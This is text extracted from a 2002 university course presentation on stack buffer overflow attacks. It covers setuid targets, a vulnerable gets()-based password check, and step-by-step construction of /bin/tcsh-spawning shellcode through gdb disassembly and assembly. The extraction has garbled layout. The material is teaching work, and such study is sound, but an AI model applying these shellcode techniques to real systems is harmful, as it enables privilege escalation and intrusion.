Buffer Overflow Attacks

³Execution of Arbitrary Code´
Aparna Bajaj Amul Shah
CS 6265 - Project Presentation September 3rd, 2002

Overview
‡ ‡ ‡ ‡ ‡ ‡ ‡ Introduction Unix Privileges Telnet Buffer Overflow Binary Attack Code Summary References
Buffer Overflow Attacks 1

March 18, 2011

Introduction
‡ Defensive Training ‡ How to Test? ‡ Knowledge is Power

March 18, 2011

Buffer Overflow Attacks

2

Unix Privileges
‡ Authorization ‡ File System
[amul@tokyo:~]%ls -ld /net/hc282/amul drwx--x--x 31 amul stud 4096 Apr 13 12:40 /net/hc282/amul

‡ Permission Inheritance
[amul@tokyo:~]%ls -l /usr/local/etc/ftpd -rwxr-xr-x 1 root root 466944 Mar 11 /usr/local/etc/ftpd 1994

‡ SetUID
[amul@tokyo:~]%ls -l /usr/lib/fs/ufs/quota -r-sr-xr-x 1 root bin 15260 Oct
/usr/lib/fs/ufs/quota

6

1998

March 18, 2011

Buffer Overflow Attacks

3

Telnet
Purpose:
± provide a fairly general bi-directional eight-bit byte

oriented communications facility. ± allow a standard method of interfacing terminal devices and terminal-oriented processes to each other. ± may also be used for terminal-terminal communication ("linking") and process-process communication distributed computation.
March 18, 2011 Buffer Overflow Attacks 4

Telnet
‡ The Threat
[amul@tokyo:~]%telnet tokyo.cc.gatech.edu smtp Trying 130.207.114.15... Connected to tokyo.cc.gatech.edu. Escape character is '^]'. 220 tokyo.cc.gatech.edu ESMTP Sendmail 8.10.2+Sun/8.9.1; Sun, 14 Apr 2002 19:11:20 -0400 (EDT) [amul@tokyo:~]%telnet tokyo.cc.gatech.edu ftp Trying 130.207.114.15... Connected to tokyo.cc.gatech.edu. Escape character is '^]'. 220 tokyo FTP server (SunOS 5.7) ready.
March 18, 2011 Buffer Overflow Attacks 5

Buffer Overflow
‡ ‡ ‡ ‡ Process Address Space Stack Overflow Overwriting Memory Structures Address Redirection

March 18, 2011

Buffer Overflow Attacks

6

Process Address Space
Low Address

Text Data BSS ‡ ‡ ‡ ‡ ‡

Heap

Unallocated Memory

Stack
High Address

Text - program instructions Data - initialized variables BSS - static uninitialized variables Heap - dynamically allocated variable data Stack - local variables
Buffer Overflow Attacks 7

char name[] = ³amul´; static char name[128]; char *name; name = (char *) malloc( 128, sizeof( char )); char 2011 March 18, name[128];

Stack Overflow
Low Address Base Pointer

Stack uid
somePtr
Command Line Args Environment Variables High Address

password

userpassword

saved bp

return

Stack Pointer

int checkpasswd (int uid, void *somePtr) { char password[128], userpassword[128]; « load password from password file into userpassword« gets(password); « return (strcmp(password, userpassword) == 0); }

March 18, 2011

Buffer Overflow Attacks

8

Overwriting Memory
‡ Data Overwriting ‡ Address Overwriting
± Buffer Pointers ± Activation Records ± Long Jump Buffers ± Function Pointers

March 18, 2011

Buffer Overflow Attacks

9

Redirection
Low Address

Text Data BSS

Heap

Unallocated Memory

Stack

‡ ‡ ‡ ‡

Guess work! All programs have the same starting stack pointer Offset starting SP Addresses are attack specific

March 18, 2011

Buffer Overflow Attacks

10

Binary Attack Code
/* project_shellcode.c Amul Shah (amul@cc.gatech.edu) 03.25.2002 This is a pseudo copy of aleph1's [1] attack shellcode How To Compile (use with gdb): gcc -ggdb -static project_shellcode.c -o shellcode */ #include <stdio.h> int main () { char *name[2]; name[0] = "/bin/tcsh"; name[1] = 0; execve(name[0], name, 0); exit(0); }

March 18, 2011

Buffer Overflow Attacks

11

Binary Attack Code
(gdb) disassemble main Dump of assembler code for function main: 0x8000130 <main>: pushl %ebp save the old base pointer 0x8000131 <main+1>: movl %esp,%ebp make the bp point to the sp 0x8000133 <main+3>: subl $0x8,%esp allocate 8 bytes of space for the 2 pointers. subtract from sp because the stack grows to lower addresses. 0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp) copy the address of the string into name[0] 0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp) copy null into name[1] 0x8000144 <main+20>: pushl $0x0 push arg 3 to execve onto the stack 0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax push arg 2 to execve onto the stack 0x8000149 <main+25>: pushl %eax 0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax 0x800014d <main+29>: pushl %eax push arg 1 to execve onto the stack 0x800014e <main+30>: call 0x80002bc <__execve> do execve(arg1,arg2,arg3) 0x8000153 <main+35>: addl $0xc,%esp 0x8000156 <main+38>: movl %ebp,%esp 0x8000158 <main+40>: popl %ebp 0x8000159 <main+41>: ret End of assembler dump.

March 18, 2011

Buffer Overflow Attacks

12

Binary Attack Code
(gdb) disassemble __execve Dump of assembler code for function __execve: standard stack operations cut for brevity 0x80002c0 <__execve+4>: movl $0xb,%eax hex syscall table index for execve 0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx copy string address to register 0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx copy name[] to register 0x80002cb <__execve+15>: movl 0x10(%ebp),%edx copy NULL to register 0x80002ce <__execve+18>: int $0x80 send interrupt into kernel 0x80002d0 <__execve+20>: movl %eax,%edx 0x80002d2 <__execve+22>: testl %edx,%edx 0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42> 0x80002d6 <__execve+26>: negl %edx 0x80002d8 <__execve+28>: pushl %edx 0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location> 0x80002de <__execve+34>: popl %edx 0x80002df <__execve+35>: movl %edx,(%eax) 0x80002e1 <__execve+37>: movl $0xffffffff,%eax 0x80002e6 <__execve+42>: popl %ebx 0x80002e7 <__execve+43>: movl %ebp,%esp 0x80002e9 <__execve+45>: popl %ebp 0x80002ea <__execve+46>: ret 0x80002eb <__execve+47>: nop March 18, 2011 Buffer Overflow Attacks End of assembler dump.

13

Binary Attack Code
(gdb) disassemble _exit Dump of assembler code for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d <_exit+1>: movl %esp,%ebp 0x800034f <_exit+3>: pushl %ebx 0x8000350 <_exit+4>: movl $0x1,%eax copy syscall table index for exit 0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx copy 0 into ebx. used exit(0) 0x8000358 <_exit+12>: int $0x80 send interrupt into kernel 0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx 0x800035d <_exit+17>: movl %ebp,%esp 0x800035f <_exit+19>: popl %ebp 0x8000360 <_exit+20>: ret 0x8000361 <_exit+21>: nop 0x8000362 <_exit+22>: nop 0x8000363 <_exit+23>: nop End of assembler dump.

March 18, 2011

Buffer Overflow Attacks

14

Binary Attack Code
1. Have the string ³/bin/tcsh´ in memory 2. Place a null in memory after the string 3. Copy 0xb into %eax 4. Copy address of the pointer to string into %ebx 5. Copy address of string into %ecx 6. Copy NULL into %edx 7. Send interrupt 0x80 instruction 8. Copy 0x1 into %eax 9. Copy 0x0 into %ebx 10. Send interrupt 0x80 instruction
movl str_addr,str_addr_addr movb $0x0,null_byte_addr movl $0x0,null_addr movl $0xb,%eax movl str_addr,%ebx leal str_addr_addr,%ecx leal null_string,%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx int $0x80 .string ³/bin/tcsh´

March 18, 2011

Buffer Overflow Attacks

15

Binary Attack Code
jmp
bytes

0x2z

# 3

popl movl
bytes

%esi # 1 byte %esi,0x8(%esi) # 3 $0x0,0x7(%esi) # 4 $0x0,0xc(%esi) # 7 $0xb,%eax %esi,%ebx
# 5 # 2

Array Position 0

Low Address code is read

movb
bytes

movl
bytes

movl
bytes

movl
bytes

leal
bytes

0x8(%esi),%ecx # 3 0xc(%esi),%edx # 3 $0x80 $0x1, %eax $0x0, %ebx
# 2 Buffer Overflow Attacks # 5 16

leal
bytes

High Address

int movl movl
bytes

bytes March 18, 2011

Summary
‡ What makes an application a good target
± Privileges ± Point of Access

‡ How to initiate a buffer overflow to do something meaningful
± Stack Smashing Attack

‡ How to create binary attack code
March 18, 2011 Buffer Overflow Attacks 17

References
WebSites
‡ Phrack e-Zine www.phrack.org ‡ BugTraq Archives hosted at www.geek-girl.com/bugtraq/ ‡ nsfsecurity.pr.erau.edu

Canonical Resources
‡ ³Aleph One.´ Smashing The Stack For Fun And Profit. Phrack, 14(49), November 1996 ‡ Matt Conover and w00w00 Security Team. w00w00 on Heap Overflows. http://www.w00w00.org/articles.html, January 1999.
March 18, 2011 Buffer Overflow Attacks 18

Sign up to vote on this title
UsefulNot useful